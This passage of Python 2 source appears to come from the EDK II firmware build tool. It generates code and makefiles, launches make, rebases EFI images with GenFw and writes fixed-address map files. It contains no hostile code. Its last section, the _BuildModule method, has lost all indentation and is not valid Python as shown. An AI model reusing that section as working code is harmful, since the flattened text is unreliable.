            self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
            if self.ThreadNumber == '':
                self.ThreadNumber = 0
            else:
                self.ThreadNumber = int(self.ThreadNumber, 0)
        if self.ThreadNumber == 0:
            self.ThreadNumber = 1
        # Active platform: command line, then target.txt, then a lone .dsc in
        # the current directory; more than one candidate is an error.
        if not self.PlatformFile:
            PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
            if not PlatformFile:
                # Try to find one in current directory
                WorkingDirectory = os.getcwd()
                FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
                FileNum = len(FileList)
                if FileNum >= 2:
                    EdkLogger.error("build", OPTION_MISSING,
                                    ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
                elif FileNum == 1:
                    PlatformFile = FileList[0]
                else:
                    EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                                    ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
            self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
    def InitBuild(self):
        # Load build configuration and validate the chosen platform file,
        # then prepare the metafile database for AutoGen.
        # parse target.txt, tools_def.txt, and platform file
        self.LoadConfiguration()
        # Allow case-insensitive for those from command line or configuration file
        ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
        if ErrorCode != 0:
            # Validate() returned a failure; abort with its diagnostic text.
            EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        # create metafile database
        self.Db.InitDatabase()
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
    def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
        # Create AutoGen code/makefiles for a platform (or a module within
        # it) and dispatch the requested make target. Returns True on
        # success, False when no AutoGen object was supplied.
        if AutoGenObject == None:
            return False
        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            if not self.SkipAutoGen or Target == 'genc':
                self.Progress.Start("Generating code")
                AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
                self.Progress.Stop("done!")
            if Target == "genc":
                return True
            if not self.SkipAutoGen or Target == 'genmake':
                self.Progress.Start("Generating makefile")
                AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
                self.Progress.Stop("done!")
            if Target == "genmake":
                return True
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(False)
            AutoGenObject.CreateMakeFile(False)
        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand == None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))
        # Name of the per-directory makefile for the active make flavor.
        makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
        # run
        # NOTE(review): the '.\SecMain' path is Windows-style; presumably this
        # target is only used on Windows hosts — verify.
        if Target == 'run':
            RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
            Command = '.\SecMain'
            os.chdir(RunDir)
            LaunchCommand(Command, RunDir)
            return True
        # build modules
        if BuildModule:
            BuildCommand = BuildCommand + [Target]
            LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            return True
        # build library
        if Target == 'libraries':
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True
        # build module (libraries first, then the modules themselves)
        if Target == 'modules':
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            for Mod in AutoGenObject.ModuleBuildDirectoryList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            return True
        # cleanlib
        if Target == 'cleanlib':
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
                if os.path.exists(LibMakefile):
                    NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True
        # clean (modules first, then libraries)
        if Target == 'clean':
            for Mod in AutoGenObject.ModuleBuildDirectoryList:
                ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
                if os.path.exists(ModMakefile):
                    NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
                if os.path.exists(LibMakefile):
                    NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True
        # cleanall: remove the whole build output directory
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            except WindowsError, X:
                # NOTE(review): WindowsError only exists on Windows/Python 2;
                # on other hosts this except clause would itself NameError.
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
        return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
    def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
        # Create AutoGen code/makefiles and launch "make" for a module or
        # platform. Unlike _BuildPa, this variant also handles the 'fds'
        # (flash image generation) target. Returns True on success, False
        # when no AutoGen object was supplied.
        if AutoGenObject == None:
            return False
        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            if not self.SkipAutoGen or Target == 'genc':
                self.Progress.Start("Generating code")
                AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
                self.Progress.Stop("done!")
            if Target == "genc":
                return True
            if not self.SkipAutoGen or Target == 'genmake':
                self.Progress.Start("Generating makefile")
                AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
                #AutoGenObject.CreateAsBuiltInf()
                self.Progress.Stop("done!")
            if Target == "genmake":
                return True
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(False)
            AutoGenObject.CreateMakeFile(False)
        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand == None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))
        # build modules ('fds' is not a makefile target, so it is not appended)
        if BuildModule:
            if Target != 'fds':
                BuildCommand = BuildCommand + [Target]
            LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            return True
        # genfds
        if Target == 'fds':
            LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
            return True
        # run
        # NOTE(review): the '.\SecMain' path is Windows-style; presumably this
        # target is only used on Windows hosts — verify.
        if Target == 'run':
            RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
            Command = '.\SecMain'
            os.chdir(RunDir)
            LaunchCommand(Command, RunDir)
            return True
        # build library: nothing to do at this level
        if Target == 'libraries':
            pass
        # not build modules
        # cleanall: remove the whole build output directory
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            except WindowsError, X:
                # NOTE(review): WindowsError only exists on Windows/Python 2;
                # on other hosts this except clause would itself NameError.
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
        return True
## Rebase module image and Get function address for the input module list.
#
    def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
        # Rebase every module image in ModuleList with the GenFw tool and
        # append each module's base address, section addresses and function
        # addresses (parsed from its linker .map file) to MapBuffer.
        # Non-SMM images are stacked downward from BaseAddress; SMM images
        # are stacked upward from the SMRAM base.
        if ModeIsSmm:
            AddrIsOffset = False
        InfFileNameList = ModuleList.keys()
        #InfFileNameList.sort()
        for InfFile in InfFileNameList:
            # progress indicator, one dot per module
            sys.stdout.write (".")
            sys.stdout.flush()
            ModuleInfo = ModuleList[InfFile]
            ModuleName = ModuleInfo.BaseName
            ModuleOutputImage = ModuleInfo.Image.FileName
            ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
            ## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
            if not ModeIsSmm:
                BaseAddress = BaseAddress - ModuleInfo.Image.Size
                #
                # Update Image to new BaseAddress by GenFw tool
                #
                LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
                LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
            else:
                #
                # Set new address to the section header only for SMM driver.
                #
                LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
                LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
            #
            # Collect function addresses from the linker map file, as
            # image-relative offsets
            #
            ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
            FunctionList = []
            if os.path.exists(ImageMapTable):
                OrigImageBaseAddress = 0
                ImageMap = open (ImageMapTable, 'r')
                for LinStr in ImageMap:
                    if len (LinStr.strip()) == 0:
                        continue
                    #
                    # Get the preferred address set on link time.
                    #
                    if LinStr.find ('Preferred load address is') != -1:
                        StrList = LinStr.split()
                        OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
                    # NOTE(review): the column layout (symbol in field 1,
                    # address in field 2, 'f' flag in field 3) is assumed to
                    # match the toolchain's map file format — verify.
                    StrList = LinStr.split()
                    if len (StrList) > 4:
                        if StrList[3] == 'f' or StrList[3] =='F':
                            Name = StrList[1]
                            RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
                            FunctionList.append ((Name, RelativeAddress))
                            if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
                                #
                                # Get the real entry point address for IPF image.
                                #
                                ModuleInfo.Image.EntryPoint = RelativeAddress
                ImageMap.close()
            #
            # Add general information.
            #
            if ModeIsSmm:
                MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
            elif AddrIsOffset:
                MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
            else:
                MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
            #
            # Add guid and .text/.data section base addresses.
            #
            TextSectionAddress = 0
            DataSectionAddress = 0
            for SectionHeader in ModuleInfo.Image.SectionHeaderList:
                if SectionHeader[0] == '.text':
                    TextSectionAddress = SectionHeader[1]
                elif SectionHeader[0] in ['.data', '.sdata']:
                    DataSectionAddress = SectionHeader[1]
            if AddrIsOffset:
                MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
            else:
                MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
            #
            # Add debug image full path.
            #
            MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
            #
            # Add function addresses
            #
            for Function in FunctionList:
                if AddrIsOffset:
                    MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
                else:
                    MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
            ImageMap.close()
            #
            # for SMM module in SMRAM, the SMRAM will be allocated from base to top.
            #
            if ModeIsSmm:
                BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
    def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
        # Merge every FV's .Fv.map file into MapBuffer, replacing module
        # GUIDs with readable module names and appending the debug image
        # path for each recognized module. No-op when no FDF file is in use.
        if self.Fdf:
            # First get the XIP base address for FV map file.
            GuidPattern = re.compile("[-a-fA-F0-9]+")
            GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
            for FvName in Wa.FdfProfile.FvDict.keys():
                FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
                if not os.path.exists(FvMapBuffer):
                    continue
                FvMap = open(FvMapBuffer, 'r')
                # skip the four FV size information header lines
                FvMap.readline()
                FvMap.readline()
                FvMap.readline()
                FvMap.readline()
                for Line in FvMap:
                    MatchGuid = GuidPattern.match(Line)
                    if MatchGuid != None:
                        #
                        # Replace GUID with module name
                        #
                        GuidString = MatchGuid.group()
                        if GuidString.upper() in ModuleList:
                            Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
                    MapBuffer.write('%s' % (Line))
                    #
                    # Add the debug image full path.
                    #
                    MatchGuid = GuidName.match(Line)
                    if MatchGuid != None:
                        GuidString = MatchGuid.group().split("=")[1]
                        if GuidString.upper() in ModuleList:
                            MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
                FvMap.close()
    ## Collect MAP information of all modules
    #
    #   @param  MapBuffer   StringIO buffer the fixed-address map text is appended to
    #   @param  ModuleList  dict of upper-case GUID -> ModuleAutoGen for all non-library modules
    #
    def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
        """Compute preferred load addresses for all modules and record them.

        Modules are bucketed by phase (PEI / BOOT / RUNTIME / SMM) with their
        cumulative image sizes; EFI images containing patchable
        load-fix-address PCDs get the page counts patched in, and finally each
        bucket is rebased via self._RebaseModule into MapBuffer.
        """
        sys.stdout.write ("Generate Load Module At Fix Address Map")
        sys.stdout.flush()
        # EFI images that carry patchable fix-address PCDs and need patching.
        PatchEfiImageList = []
        # Phase buckets: MetaFile -> PeImageInfo.
        PeiModuleList = {}
        BtModuleList = {}
        RtModuleList = {}
        SmmModuleList = {}
        # Cumulative image sizes per phase, in bytes.
        PeiSize = 0
        BtSize = 0
        RtSize = 0
        # reserve 4K size in SMRAM to make SMM module address not from 0.
        SmmSize = 0x1000
        IsIpfPlatform = False
        if 'IPF' in self.ArchList:
            IsIpfPlatform = True
        for ModuleGuid in ModuleList:
            Module = ModuleList[ModuleGuid]
            GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
            OutputImageFile = ''
            # Only the first '.efi' coda target of a module is considered.
            for ResultFile in Module.CodaTargetList:
                if str(ResultFile.Target).endswith('.efi'):
                    #
                    # module list for PEI, DXE, RUNTIME and SMM
                    #
                    OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
                    ImageClass = PeImageClass (OutputImageFile)
                    if not ImageClass.IsValid:
                        EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
                    ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
                    if Module.ModuleType in ['PEI_CORE', 'PEIM', 'COMBINED_PEIM_DRIVER','PIC_PEIM', 'RELOCATABLE_PEIM', 'DXE_CORE']:
                        PeiModuleList[Module.MetaFile] = ImageInfo
                        PeiSize += ImageInfo.Image.Size
                    elif Module.ModuleType in ['BS_DRIVER', 'DXE_DRIVER', 'UEFI_DRIVER']:
                        BtModuleList[Module.MetaFile] = ImageInfo
                        BtSize += ImageInfo.Image.Size
                    elif Module.ModuleType in ['DXE_RUNTIME_DRIVER', 'RT_DRIVER', 'DXE_SAL_DRIVER', 'SAL_RT_DRIVER']:
                        RtModuleList[Module.MetaFile] = ImageInfo
                        #IPF runtime driver needs to be at 2 page alignment.
                        if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
                            # NOTE(review): '/' is Python 2 integer division here — revisit if ported to Python 3.
                            ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
                        RtSize += ImageInfo.Image.Size
                    elif Module.ModuleType in ['SMM_CORE', 'DXE_SMM_DRIVER']:
                        SmmModuleList[Module.MetaFile] = ImageInfo
                        SmmSize += ImageInfo.Image.Size
                        if Module.ModuleType == 'DXE_SMM_DRIVER':
                            PiSpecVersion = '0x00000000'
                            if 'PI_SPECIFICATION_VERSION' in Module.Module.Specification:
                                PiSpecVersion = Module.Module.Specification['PI_SPECIFICATION_VERSION']
                            # for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
                            if int(PiSpecVersion, 16) < 0x0001000A:
                                BtModuleList[Module.MetaFile] = ImageInfo
                                BtSize += ImageInfo.Image.Size
                    break
            #
            # EFI image is final target.
            # Check EFI image contains patchable FixAddress related PCDs.
            #
            if OutputImageFile != '':
                ModuleIsPatch = False
                for Pcd in Module.ModulePcdList:
                    if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
                        ModuleIsPatch = True
                        break
                if not ModuleIsPatch:
                    for Pcd in Module.LibraryPcdList:
                        if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
                            ModuleIsPatch = True
                            break
                if not ModuleIsPatch:
                    continue
                #
                # Module includes the patchable load fix address PCDs.
                # It will be fixed up later.
                #
                PatchEfiImageList.append (OutputImageFile)
        #
        # Get Top Memory address
        #
        ReservedRuntimeMemorySize = 0
        TopMemoryAddress = 0
        if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
            # 0xFFFFFFFFFFFFFFFF means "top of memory": addresses become offsets.
            TopMemoryAddress = 0
        else:
            TopMemoryAddress = self.LoadFixAddress
            if TopMemoryAddress < RtSize + BtSize + PeiSize:
                EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
            # Make IPF runtime driver at 2 page alignment.
            if IsIpfPlatform:
                ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
                RtSize = RtSize + ReservedRuntimeMemorySize
        #
        # Patch FixAddress related PCDs into EFI image
        #
        for EfiImage in PatchEfiImageList:
            EfiImageMap = EfiImage.replace('.efi', '.map')
            if not os.path.exists(EfiImageMap):
                continue
            #
            # Get PCD offset in EFI image by GenPatchPcdTable function
            #
            PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
            #
            # Patch real PCD value by PatchPcdValue tool
            #
            for PcdInfo in PcdTable:
                ReturnValue = 0
                # Page counts are sizes divided by the 4K page size (0x1000).
                if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize/0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize/0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize/0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize/0x1000))
                if ReturnValue != 0:
                    EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
        MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize/0x1000))
        MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize/0x1000))
        MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize/0x1000))
        if len (SmmModuleList) > 0:
            MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize/0x1000))
        # Regions are stacked downwards from the top address: PEI below BOOT below RUNTIME.
        PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
        BtBaseAddr = TopMemoryAddress - RtSize
        RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
        self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
        # SMM modules start at the reserved 4K offset inside SMRAM.
        self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset = False, ModeIsSmm = True)
        MapBuffer.write('\n\n')
        sys.stdout.write ("\n")
        sys.stdout.flush()
    ## Save platform Map file
    #
    #   @param  MapBuffer   StringIO buffer holding the accumulated map text;
    #                       it is closed by this method
    #   @param  Wa          workspace autogen object supplying BuildDir and Name
    #
    def _SaveMapFile (self, MapBuffer, Wa):
        #
        # Map file path is got.
        #
        MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
        #
        # Save address map into MAP file.
        #
        SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
        MapBuffer.close()
        # Point the user at the map file only when fixed-address loading is active.
        if self.LoadFixAddress != 0:
            sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" %(MapFilePath))
            sys.stdout.flush()
    ## Build active platform for different build targets and different tool chains
    #
    def _BuildPlatform(self):
        """Single-threaded platform build over every TARGET/TOOLCHAIN pair.

        For each combination a WorkspaceAutoGen is created, each module of
        each architecture is collected and built via _BuildPa, and for the
        "", "all" and "fds" targets the fixed-address MAP file is produced.
        """
        for BuildTarget in self.BuildTargetList:
            GlobalData.gGlobalDefines['TARGET'] = BuildTarget
            for ToolChain in self.ToolChainList:
                GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
                GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
                Wa = WorkspaceAutoGen(
                        self.WorkspaceDir,
                        self.PlatformFile,
                        BuildTarget,
                        ToolChain,
                        self.ArchList,
                        self.BuildDatabase,
                        self.TargetTxt,
                        self.ToolDef,
                        self.Fdf,
                        self.FdList,
                        self.FvList,
                        self.CapList,
                        self.SkuId,
                        self.UniFlag,
                        self.Progress
                        )
                # The workspace may refine the FDF file and the fix address.
                self.Fdf = Wa.FdfFile
                self.LoadFixAddress = Wa.Platform.LoadFixAddress
                self.BuildReport.AddPlatformReport(Wa)
                self.Progress.Stop("done!")
                for Arch in Wa.ArchList:
                    GlobalData.gGlobalDefines['ARCH'] = Arch
                    Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                    for Module in Pa.Platform.Modules:
                        # Get ModuleAutoGen object to generate C code file and makefile
                        Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                        if Ma == None:
                            continue
                        self.BuildModules.append(Ma)
                    self._BuildPa(self.Target, Pa)
                # Create MAP file when Load Fix Address is enabled.
                if self.Target in ["", "all", "fds"]:
                    for Arch in Wa.ArchList:
                        GlobalData.gGlobalDefines['ARCH'] = Arch
                        #
                        # Check whether the set fix address is above 4G for 32bit image.
                        #
                        if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                            EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                    #
                    # Get Module List
                    #
                    ModuleList = {}
                    for Pa in Wa.AutoGenObjectList:
                        for Ma in Pa.ModuleAutoGenList:
                            if Ma == None:
                                continue
                            if not Ma.IsLibrary:
                                ModuleList[Ma.Guid.upper()] = Ma
                    MapBuffer = StringIO('')
                    if self.LoadFixAddress != 0:
                        #
                        # Rebase module to the preferred memory address before GenFds
                        #
                        self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                    if self.Fdf:
                        #
                        # create FDS again for the updated EFI image
                        #
                        self._Build("fds", Wa)
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                    #
                    # Save MAP buffer into MAP file.
                    #
                    self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
self.Progress.Stop("done!")
MaList = []
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Ma = ModuleAutoGen(Wa, self.ModuleFile, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None: continue
MaList.append(Ma)
self.BuildModules.append(Ma)
if not Ma.IsBinaryModule:
self._Build(self.Target, Ma, BuildModule=True)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" %\
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
